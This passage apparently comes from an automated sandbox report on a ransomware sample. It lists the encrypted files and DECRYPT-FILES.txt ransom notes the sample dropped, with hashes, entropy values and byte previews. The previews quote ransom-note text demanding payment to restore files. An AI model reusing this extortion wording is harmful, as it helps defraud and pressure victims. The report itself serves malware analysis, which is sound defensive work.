.r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Desktop\PIVFAGEAAV.mp3 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1320
Entropy (8bit):	7.829423461233073
Encrypted:	false
MD5:	9658077282FA99290E1E52894BD785B0
SHA1:	C33450723B55570A6B32F7DF81A20738D700C0FF
SHA-256:	BBD781602C0E818344142EA6EA8BCE26E539C0B10ABC7BDD098CC9C7A07CA09C
SHA-512:	C0C7630934B7E884F71671211C5A39C99F8D93F5A89FF57DF17079FC457D505AF583AEFA16A71D6781B40D4AB890D64A679C5C5E184C586BA81AF589A5F64920
Malicious:	false
Preview:	.:S.>X.l.......~.....S\...!..............:X.!.o<n.e.).i.0w=DH....V.H...3......\...l;.5]#r.S.l:.......V`~~N.fL..]..FnJ.../....g...)^{_........Y..c ...J.aG1.q...{...<T..\|4.. .'.w..h.\..c..9J:.g..^...4.3.....C...D..pN....dWaz.....P. z.kC....D.....f.af....._'....M.s.26..8]W.W..h..N...LK...'.......q.......?...r.F...i...7..}..2...ZMc..6j\|..G.K...e..P.-u8}..#8.....(t..h.,,..&..E...F.B.R.j...z.....!..!...._\|.%..!....Ce.....~[RD.q..Q.lUy7C...Q....y..T..=.V......$...^yZ...i6'.....^......<."....f.afDSz.U..G.&9..z>..U......F..ZU.-....T.>.$...p6..)...y..{A...v.Na.......0..6..v..+.'..H....f.7&.#...K..c.U.=........9.t5.......-.~.....2...!.l....].)....[..._.$.f.X.'.io4..j).J.....&.;Q..._.I..Jo.......}..yY.BK....Ib.V.>K..x.?'......>5...@....&.....f.af1..2_...a<A~..\|..RUyRT...-Xkt...L...Z..}..p`.%...p.Q....Ls.M.9.a;.b..".aN3[...B.Lr..........S.`.k.a......p..t'..^sC.. ...S?.RH.`..H....6.n._.W._..2...!{.f;..f...Y..Jf.....o.9.fQ.\|.....h.......p...[...

C:\Users\user\Desktop\QNCYCDFIJJ\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Desktop\QNCYCDFIJJ\GRXZDKKVDB.mp3 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2112
Entropy (8bit):	7.8813150486964565
Encrypted:	false
MD5:	3043A575BF8163D3B623FC65892DFD10
SHA1:	859E6FEC43368181DD70D1FB29BF1B6BF6DDACF7
SHA-256:	4734AADC1BA84EAEB090EBB5DFC9C8EE09ACDCCC9D0DEE4CF132B1326F7D2044
SHA-512:	F2AC7CB567A4FC2E7A4366E3C4330196138C9C8E0071B4DF50081EF7E7C08BDD48F575B70AC835BEF66CB5E5D13ABAE0D374DE61C48626514883305E6831BA8C
Malicious:	false
Preview:	JAa...}@.~._...t.6..{...K=$.W.0!F....&T...w...+.._...C.gFI...t.7......+.L..v-@^..PCY....;....t8.R.31......]. V..o.../.z..?.WX.....k...t.,6.#...A......A8..SD..O....p"....q......y6}gM...M=..}.N...5.t\|...Q.`..<..Q..!..).J.M\..A....<...L..a.x,.......f.af....f.~..^..y...a=..FS.M......;.....].wY2Ui.^Pp.......l.q..g...~eT..hZ..^.C5Q.s`..B....gy.,.m.^'D..aAT...."..q..U.9..~.6.....k8.R..t.iu....s.....y.q.Y."\|5.n./...V[!..4.Z....%.A!0s..w....d.7s.$..>V.,z@5...%6.Gx...8o..?..uE..."...h..T.pN......kp....f.af....\........&....D.j.3.84?`U..R=..`Y.n..h.....x............$.....+..%<m..q..H.tD..~..;.....^BEh..!..T{6B...$...f;.w:............H.y.M...D...OD`.....4aT..S8.#.....lu...l.<.dT..R~c.{u..QTe...F...s.t_.jS.4......=............a<......q.%}..b...g.u/..F.....f.af.......8?.nc...^..LP.....SX.j'.p......P...'.f...J).68h..T.Dn..w.l'..Z..by.A.@U...1..F`.B...UI_...N........1..~97.V...._....W.=+f.....]...G. ..4..rK..X..b'.6........R\|.?.~].yY'f......P'B..ou.k....Z)..u

C:\Users\user\Desktop\SQSJKEBWDT.jpg Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1056
Entropy (8bit):	7.78913955067749
Encrypted:	false
MD5:	45D0DD8EE6A677E527C243D658C5223A
SHA1:	F44C71ABA0FAE847F7DA51090A26314DFC14AA39
SHA-256:	C75921794E40BB06A2F965F1784977122877855740CCA0C6E69984984133A4C3
SHA-512:	B67FB91B21319E3C6710BEF17E6AB0F4F294DD342582585B6C9DC41D538020F25D816D4127B99B5FCCE77B9FA597C836DDE0C074344DEEDD3AC3A1A56058CC8D
Malicious:	false
Preview:	\.....@m..,..`.~....DwgF......9Ub..i....-...w...3p.{.t.,D..){W\..H..8....&... ...I.#.Y.v&vD....T7.}.p..0...Dr@j....z.$RZ..H.b..y...I.2...nn.....}.v7.K...4...x.1^.K.,.s..p..c..H.cr./..~..0x...T@~zyg.H..L...aAS.#.:}OQ.........."N9A....:.6.t.,..v$....f.afv".@,..6t?....o.#.....bB'\|..O....&.^.F.c..n..........Z.!3.H=...,uM.....A...)....\|.Z.U.O..2..,@...p......qcr.....1!k...p...N.(....I.....>g..E."....6........h%..m.j.G..;.."ZH..go....rx..3x......y......7.''.%.....1....b..r..........{].i....3..j....f.af.(...!0..`.......+..5zt.........H.Xr/..R....k..W.T....3\.q{.....^..e5.S..=.Q...r...O.`y..<N.x.....x..I\|%%X.......!..Y..B..;.z...}&.1...%...{"0.1z.......X..=_.m.w_c5.=........w.......z;.d..Z.A....X..K.\..d...p._..:...1..h......g.L..........f.af.R..!.K...6..&.1W....g.. .Lv..E.._@.DV.w...@.l.".[].;s.EP.w.."...{.5^B.>j[...1...c..m...U...\|E...i....$..<........(.LQ.6.H..}..2;n...'...=.4..oA..gt..sbL..s$'..N..S.,..)..V./`......gz..Fz..=.`V..M

C:\Users\user\Desktop\SQSJKEBWDT\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Desktop\~$Verdi.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.172347312086877
Encrypted:	false
MD5:	3CEDA81C44E5988BA37C862F4C1BC311
SHA1:	56911888EC197CED0327CBDE4E6521C4770CE201
SHA-256:	04C880686A8F7E38D106B218A09269385268BB352C48D90C4D2A89F129F6BE3E
SHA-512:	7688D8A659C2BD376CDB39B5ADEE16471411A39726B424138026BCB9B0B7ABEC6EBD3A5FA6B58B62201646C69A2BFE59402E7F7B8FE316B8BBA7A197200240CA
Malicious:	true
Preview:	.user.............................................l.u.k.e.t.a.y.l.o.r......f.........$\.."[g..................................................2.........h.7.

C:\Users\user\Documents\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	36752
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	DD507F9F474F821FEF28D4BE121FF6FF
SHA1:	CE9F35A9FD98C71F7ECDE1EAA9BE022F35E5AEA6
SHA-256:	D38AD86F8AC32279BC30D2B832AD2CFD6ABE708F3DBA9575B2B30EF3D78E934A
SHA-512:	65396D5107E23015C429C0E58730A673C38B9A06F98C91F097D664F11A86C2BCA4A837AC03999DE69CE2B956721E6D194E57526D6EFA5DE267134E50C979E92F
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2112
Entropy (8bit):	7.880671526008083
Encrypted:	false
MD5:	125826BDBF21941EAFFF9D59B90F0ECE
SHA1:	C918A8A1F385AC4213E6B1BA6DD3C65C48381DA3
SHA-256:	4451805F2BBFF8D89AEC3443F3B636FE2350F17092C09A68C4C39F8A1A37724B
SHA-512:	B3655C2857290135587DEB04C366FAF7DD62304C52FAB619CCA044B3F88DED96F02169B3538012720FA57616C4910364C7FE7D4DA4013B5BD3E44A9AEC7EF818
Malicious:	false
Preview:	.....jY...iSL...,...!....hp....+...<...j......Y........;..og,...'Y...P..g......Cm;.ZkS. .p.^z.j.}u`,.D.o..m..\|.....:..U.....G.>.{....P......i;...6..<A........nc-...aOX...B..#.....`!./..e=.e.a....CKt....".......x..w..%..u$..$b4........(Ui.].]....f.af..X.>....M.N....<.u..(........=j...H..d..f.../..:s.3...]..?~.l..u.c......P5....^.mhN2."....8.....a...q.I.b~..=........=.0.ZF.Y.20&.A9<X!.....;..N.ca).}.G..uF...s..3...y..I.V...?.....q.H.R[T9..$j.......N__..0....F.B...f;.nHJ..$:..0....._......f.af.E.`.@..y...........$7$.7.P.1.~.X.....#...?+..M,.......NlZ.........K..Jk...S./..iIh..P..m..$..)....^......?../._.e.H5^}C1.Z.u.z..M.ck\|c....(.:....m.:Y.D...%.oR...q.(H.Tj.......o.M......~.....j..7."....QPU._.L\......... ..V}..9.C.Jt(.[......m.a.$..q....f.af.T.w3......g.Tv.. .D&! 1..BU....\|.....z...r.........#a..V-....k..3..c'1.S.yj[...xa.,c-g..1F.#s....o....W..........]m"..,7%9.C./..7..Nt........<T..p.u....%.....}..<f.'.r&.........Y.=..?.v.gb.7;/hb.UI-.

C:\Users\user\Documents\NVWZAPQSQL.png Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.1412019678008205
Encrypted:	false
MD5:	D42AD0F1A661C79EE1E36CB6E6A71497
SHA1:	DD6FBB3A6628876414494AFE5470258B848DBCDF
SHA-256:	EBD33BCB242548E966DB602A783E1C3DADB118BA26D74A0D5D1783908C6A6D3A
SHA-512:	4ECF3936ED6C9EC3BD087264753CC1A4E14425F4EDCAED781F1C3A0C8BC7F3F438232D0FE8A714B9D104FD64B88C5D003DC2E2FD166D44213158413CD82862B0
Malicious:	false
Preview:	2."..g.}..........a5..5.>..n!...A.@..9..n..N.....V\|st..dMZeao.kL.x../..v...9.0o......<....P.6.%.T.g..."x...Fbsi..{.....Z({.E....T....l..F4 h............g...=...G.l...r..da...rn.K~ir......9y..D..E.........\]Lo.t.*ER&......F..gm..yQ..0......_......A.......f.af

C:\Users\user\Documents\PALRGUCVEH\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Documents\PIVFAGEAAV.mp3 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1320
Entropy (8bit):	7.810333574921371
Encrypted:	false
MD5:	4071F85D27BC72ED6E696CCB61B2E9AE
SHA1:	ACF3A252AEE0B0C83C001054A794BCA0187C85EA
SHA-256:	96087BA8E6AF50D53C0FA62AD4D121BEAA21B14523F1089552BF23F6559CDFAF
SHA-512:	1B489AAF83F2559A0AA3414A31DA0A7266C9BC6073FB3DF9DCCF26BCCC93DB0A895FDAFBA0F12170F2C7875633B2D9E9ADC1CF26EF0DA8F4E69BCDC81AE2BB27
Malicious:	false
Preview:	."......i.]...U...=I....{.h.a.#k.M.....8.....T.o..>.....E.z...T#\...d....q.K...:.9.+.sd...C..N..M.......Q.H..ms.9.D&...i......`.wM.k+D..B..OB...'..._.........=...\|.bt.t...j.:X..l.SgS;$4...E.G@..h.q_.H.E.7.O.,.b..I&...\<&....m#.A.m.....I.(..h(tUc....f.af.N...)..m..w...W-.....k^...{.......D.....kpn.D.......Zy.=&l..d...D].u>...Ni.0.l<nAz.......U...~ru...y..[.5cR....0.c..S......m[.h.."$T...d... Yu...O. }k.1..J...'PS(.{.B....>.....[M.Q.}.....6.h.e.Z.._....h.W2a...wm..Xu.ATX..v.'..,.#,Q,........f.af........v......v/.>F.Dvd....x.F}vY7...))y&.5VA.QF..1.........SE.5."Vx.....F\.p....nI.............-..\|f1...c.N.."..l...[l d.8..x)"{..k.../C..@.H.R..)A:../!g..4w.l......+{.!.(~..;..m.S....O.'...wBx.:....DR..T..XL4&.....9..Q.?.<...d...y.............f.af..lY.....x"....v..q....O...!P....7...YR.."..XX...a~..e.t...,.?..$.....b(..xi..\|6..Q7.U..l.@.P..+......f.5..t....................O(..cm.....s...cD...K..r.......K.]<.W._..*...%\|y5...0.....Z..D

C:\Users\user\Documents\QNCYCDFIJJ\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\Documents\QNCYCDFIJJ\GRXZDKKVDB.mp3 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2112
Entropy (8bit):	7.879734530987329
Encrypted:	false
MD5:	1D7D57B53E9862BFC3296C35128CF43F
SHA1:	B868243C97E8488015B37CB1993F4C56EAFA75E6
SHA-256:	4B5D43204500FFA9FA3A2A5CC0A56BF348FBA3EF36849FEEBD3095D8720ADD9E
SHA-512:	A60B51AD166F6FBD6C36935A3582AB88E2DFABA884CA08EA4B7B6594C10C6F304CAB075352F97A9EA7E7E17C341B7A36FB6548F9E1FB235D8285F186D0BD1600
Malicious:	false
Preview:	.^.H.N#X.K........h!=U{.8.y.${..K].~.lX/.......l.v..F..T..~...d..~.....#.w.d.M.1{.M8.s".....7...bR...G..t.<.Bj.)..1.u..Js.......F.&}'..(.;,.$}.%dh.i.Z.6.@.I.D8s....\..1U.]N....ef......Vz.`......i.3M.R..D.j."~UF..}.D%....=J;...1.X`.........2..A._6.I.E.......f.af.M=@.......\|...O..#R.m..x.s.j.q....Vn.<..g..b.r#.....8_X...t..K..)2.$e}~wWT.+.8..b.i..'T....u.....aHh&U7[K.M.....@7R/@>..y.j..1.....i#.e..H..pP..zU..Z:$.VR..\....@gddv.F.,Cu.G.........4[pb2gW.7.e.....2..d..x..A.J..\|]...5...V.bx.Z^.I6....].L....f.af.q.=X...v7k>?%....4$.?.m9..X"..eT..x.Y.k....#.,"..yk...=.I.>Q..;...Z.L.-..N(:..?!....+uO9!R.1..Jo .....8[R.{.,.L\|..).:.....~..H..3.~...T.DAV$.8.G.?&.Y..\A..r.,...G..yi......\|p`.......!.Z.sH.-Dt....%.O...+:....o..Z.l.....'I...f_.}q..-d.b..t.......f.af.......@.Id>}..#\...K.{.....{%Z".C*V<.uw)..3....G.<...s.`....F0?..n...T.....U]OW%....&.7.#.Ex...P.3...1.P.S....&..3.r.w.....Q.<.\|.Q....vO..:.AT....~8f..7;....h.f...t:...9.({..T....u....M.Y..qs......

C:\Users\user\Documents\SQSJKEBWDT.jpg Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.580490191596189
Encrypted:	false
MD5:	0BC93D81BF0BF40C6E863C86E4AEB77F
SHA1:	BD69AD35E5B6E6AB0B80880318974DDDCDC8887B
SHA-256:	27810D1B26DE7051B95DB7D385AC809E09520B8DBE108F780B6F40E5631D8E35
SHA-512:	837745583FD59AC15EA4E789192AB4A3CC21031D18D337A4FC9DCB562ABB2408BB02B81AC6A162F80FBBD913A62DE607429B08FA95AD0676DD581F8633D37708
Malicious:	false
Preview:	4(..{..}.....j....a..SG7Q.....$F.1J..s..A->"......Y.r..~q..._.!%.u..q.F.l>.i..V.a..mw..o4j...Y1...Y....)!....!KZ..v..ov0 g....Vv...c..e.H.y.?W.....R.m.MW/..v7...0..(9..H..Y.Z.C...0.}C.N...~rou'.7r.T.P&(."...xL..=..b......2G9.."........jZ..!......f.af....(.&.._.T.b.k..k,.uZ*.T....w._..`B.^....xQ2\|cu..N.)..y'...aM.OLk..i.g.....y.I...{u..:+.--..Q.....e.{e{.'.(....!...7z...."....4.(a.J.......i..\|...)<a..:..zX..sdl....8.%...l.x...o.......ORS..!I.d..\|...M ..Q.tt.t...:.z.D.`...t..\|".l.....?7f........f.af

C:\Users\user\Documents\SQSJKEBWDT\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

